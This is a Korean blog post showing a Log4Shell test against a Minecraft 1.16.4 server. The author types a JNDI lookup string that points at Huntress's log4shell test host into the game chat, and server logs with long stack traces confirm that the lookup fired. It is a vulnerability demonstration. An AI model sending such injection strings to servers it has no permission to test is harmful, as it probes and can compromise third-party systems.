글 작성자: 근삼이

테스트 대상 사이트

  • modutech 마인크래프트 공개 서버
    • 서버 주소 : 비밀><(테스트 목적은 개인 문의)
    • 서버 버전 : 1.16.4
  • 테스트 코드
${jndi:ldap://log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43}
  • 방법 : 마인크래프트 체팅창에 익스플로잇 코드를 입력... 끝... 

Log4j 안쓰는 java어플리케이션이 뭐가 있을까.. 보안 담당자들 머리 터지는 소리가 여기까지 들리는거 같다.

  • 동작 확인

  • 서버 로그
>2021-12-12 06:18:30,471 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap:/                                                     /log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingExce                                                     ption: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d                                                     7055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.                                                     java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompo                                                     siteContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.                                                     java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitut                                                     or.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:                                                     427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatt                                                     ernConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.j                                                     ava:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializa                                                     ble(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:232                                                     )
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:217                                                     )
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:57)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncode                                                     Event(AbstractOutputStreamAppender.java:177)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(Ab                                                     stractOutputStreamAppender.java:170)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(Abstr                                                     actOutputStreamAppender.java:161)
        at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(Ro                                                     llingRandomAccessFileAppender.java:218)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderCon                                                     trol.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderContr                                                     ol.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursio                                                     n(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderContro                                                     l.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.jav                                                     a:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.j                                                     ava:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(Awai                                                     tCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java                                                     :2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:185                                                     2)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.ja                                                     va:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209                                                     )
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(Colour                                                     edConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515                                                     )
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.j                                                     ava:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.                                                     java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

2021-12-12 06:18:31,083 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap://                                                     log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingExcep                                                     tion: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d7                                                     055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.                                                     java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompo                                                     siteContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.                                                     java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitut                                                     or.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:                                                     427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatt                                                     ernConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.j                                                     ava:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializa                                                     ble(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializa                                                     ble(PatternLayout.java:323)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.                                                     java:208)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.                                                     java:57)
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderCon                                                     trol.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderContr                                                     ol.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursio                                                     n(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderContro                                                     l.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.jav                                                     a:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.j                                                     ava:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(Awai                                                     tCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java                                                     :2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:185                                                     2)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.ja                                                     va:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209                                                     )
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(Colour                                                     edConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515                                                     )
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.j                                                     ava:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.                                                     java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

2021-12-12 06:18:31,696 Async Chat Thread - #2 WARN Error looking up JNDI resource [ldap://                                                     log4shell.huntress.com:1389/79473262-b412-41d8-aa97-56d7055bfa43]. javax.naming.NamingExcep                                                     tion: [LDAP: error code 1 - Operations Error]; remaining name '79473262-b412-41d8-aa97-56d7                                                     055bfa43'
        at java.naming/com.sun.jndi.ldap.LdapCtx.mapErrorCode(LdapCtx.java:3299)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:3205)
        at java.naming/com.sun.jndi.ldap.LdapCtx.processReturnCode(LdapCtx.java:2996)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1062)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.                                                     java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompo                                                     siteContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.                                                     java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:129)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:54)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:183)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitut                                                     or.java:1054)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:976)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.ja                                                     va:872)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:                                                     427)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatt                                                     ernConverter.java:127)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.j                                                     ava:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializa                                                     ble(PatternLayout.java:333)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializa                                                     ble(PatternLayout.java:323)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.                                                     java:208)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.                                                     java:57)
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderCon                                                     trol.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderContr                                                     ol.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursio                                                     n(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderContro                                                     l.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.jav                                                     a:448)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.j                                                     ava:433)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:417)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:403)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(Awai                                                     tCompletionReliabilityStrategy.java:63)
        at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:146)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java                                                     :2091)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:1993)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:185                                                     2)
        at org.apache.logging.log4j.io.ByteStreamLogger.log(ByteStreamLogger.java:114)
        at org.apache.logging.log4j.io.ByteStreamLogger.extractMessages(ByteStreamLogger.ja                                                     va:103)
        at org.apache.logging.log4j.io.ByteStreamLogger.put(ByteStreamLogger.java:137)
        at org.apache.logging.log4j.io.LoggerOutputStream.write(LoggerOutputStream.java:65)
        at java.base/java.io.PrintStream.write(PrintStream.java:559)
        at org.apache.logging.log4j.io.LoggerPrintStream.write(LoggerPrintStream.java:224)
        at java.base/sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:233)
        at java.base/sun.nio.cs.StreamEncoder.implFlushBuffer(StreamEncoder.java:312)
        at java.base/sun.nio.cs.StreamEncoder.flushBuffer(StreamEncoder.java:104)
        at java.base/java.io.OutputStreamWriter.flushBuffer(OutputStreamWriter.java:184)
        at java.base/java.io.PrintStream.newLine(PrintStream.java:625)
        at java.base/java.io.PrintStream.println(PrintStream.java:883)
        at org.apache.logging.log4j.io.LoggerPrintStream.println(LoggerPrintStream.java:209                                                     )
        at org.bukkit.craftbukkit.v1_16_R3.command.ColouredConsoleSender.sendMessage(Colour                                                     edConsoleSender.java:67)
        at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:1756)
        at net.minecraft.server.v1_16_R3.PlayerConnection.c(PlayerConnection.java:1648)
        at net.minecraft.server.v1_16_R3.PlayerConnection.a(PlayerConnection.java:1586)
        at net.minecraft.server.v1_16_R3.PacketPlayInChat$1.run(PacketPlayInChat.java:41)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515                                                     )
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.j                                                     ava:1128)
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.                                                     java:628)
        at java.base/java.lang.Thread.run(Thread.java:834)

[06:18:29] [Async Chat Thread - #2/INFO]: [노예] GeunSam2 : ${jndi:ldap://log4shell.huntres                                                     s.com:1389/79473262-b412-41d8-aa97-56d7055bfa43}

참고 자료

 

반응형